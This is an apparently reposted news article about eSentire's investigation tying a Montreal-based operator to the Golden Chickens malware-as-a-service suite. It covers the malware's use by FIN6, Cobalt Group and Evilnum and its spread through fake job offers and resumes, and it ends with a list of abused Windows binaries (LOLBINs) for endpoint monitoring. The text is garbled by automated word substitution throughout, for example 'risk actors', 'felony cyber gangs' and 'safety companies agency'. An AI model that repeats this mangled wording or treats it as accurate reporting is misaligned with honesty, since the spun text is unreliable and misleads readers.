Montreal man alleged to be an operator behind the Golden Chickens malware | IT World Canada News

One of the risk actors behind the Golden Chickens malware suite mentioned to be favoured by three main Russian felony cyber gangs lives in Montreal, based on an investigation by a Canadian-based managed safety companies agency.

The claim was made Thursday by researchers at eSentire following a 16-month investigation into the particular person behind posts on a lot of hacker boards and social media websites the place “Chuck in Montreal” could have made some slips — together with mentioning his love for BMWs.

The report doesn’t title the person. But eSentire’s risk response unit says it is aware of “Chuck’s” actual title, has photos of him, his residence deal with, the names of his mother and father, siblings, and pals; his social media accounts, his hobbies, and that he owns a small enterprise which he runs out of his residence. He additionally has a eager curiosity in shopping for stolen Canadian bank card accounts, the researchers say.

Their work has been turned over to police, although the report doesn’t say which power.

In addition to being an fascinating instance of methods to use publicly-available risk intelligence and sleuthing, the report contains indicators of compromise and methods utilized by main risk teams that IT safety groups can leverage.

The researchers additionally allege police missed a chance years in the past when Trend Micro published a report in 2015 a few risk actor utilizing the names “Frapstar” and “badbullzvenom.” eSentire believes Frapstar is “Chuck” and shares the badbullzvenom account with one other operator of Golden Chickens. That particular person claims to be from Moldova.

The 2015 Trend Micro report “provided solid intelligence about this threat actor, giving law enforcement a real chance of identifying and potentially arresting badbullzvenom when he was still a minor player on the cybercrime scene,” says eSentire.

“Instead, he has had seven years to hone his skills, and from our findings, we see that he has continued to get better at developing malware and obfuscating it. Badbullzvenom is very stealthy, and he goes to extremes to keep his malware fully undetectable (FUD) by anti-virus, trying to make sure that samples of Golden Chickens are not uploaded to Virus Total. Badbullzvenom also insists that his clients only use his malware in very “targeted” assaults to additional make sure that he and his malicious software program fly underneath the radar. We imagine the case of the Golden Chickens operator is a stark instance of what can occur if a risk actor, who is taken into account “low hanging fruit,” is ignored by legislation enforcement.”

It isn’t recognized if police ignored the report.

eSentire says Golden Chickens is the “cyber weapon of choice” for 3 of the highest cash making and longest-running Internet crime teams: Russia-based FIN6 and Cobalt Group, and Belarus-based Evilnum. The three are estimated to have collectively brought about monetary losses over US$1.5 billion, the researchers say.

Since 2018, the Golden Chickens suite has been distributed as Malware-as-a-Service (MaaS), the report says. Between April 2021 and April of this yr, the researchers found two important hacking campaigns using Golden Chickens. During the April 2021 incidents, company workers on LinkedIn had been focused with faux job affords. One yr later, the assault ways had been reversed, with corporate hiring managers despatched faux resumes of job candidates, laden with malware.

There is compelling proof that the risk actor detailed within the report is considered one of probably two operators behind the badbullzvenom account on the hacker discussion board, says eSentire.

“Interestingly,” it provides, “as of July 2022, all of badbullzvenom’s posts on have been purged from the forum.” That might be as a result of a risk actor calling themselves  “babay” went on to and accused badbullzvenom of stealing $1 million from him. Babay has issued a $200,000 bounty for any info resulting in badbullzvenom’s actual id.

On the opposite hand, eSentire continues to see enhancements within the Golden Chickens supply code and new Golden Chickens assault campaigns. “That tells us that the malware suite is still actively being developed and is being sold to other threat actors,” the report says.

eSentire recommends IT safety leaders use exhaustive endpoint monitoring for LOLBINs, also referred to as Trusted Windows Binary abuse. LOLBINs of curiosity embody cmd.exe, wscript.exe, wmic.exe, cmstp.exe, msxsl.exe, powershell.exe, and ie4uinit.exe. Ensure endpoint merchandise have guidelines in place to detect suspicious utilization of those Windows processes, the report says.

Source link

Comments are closed.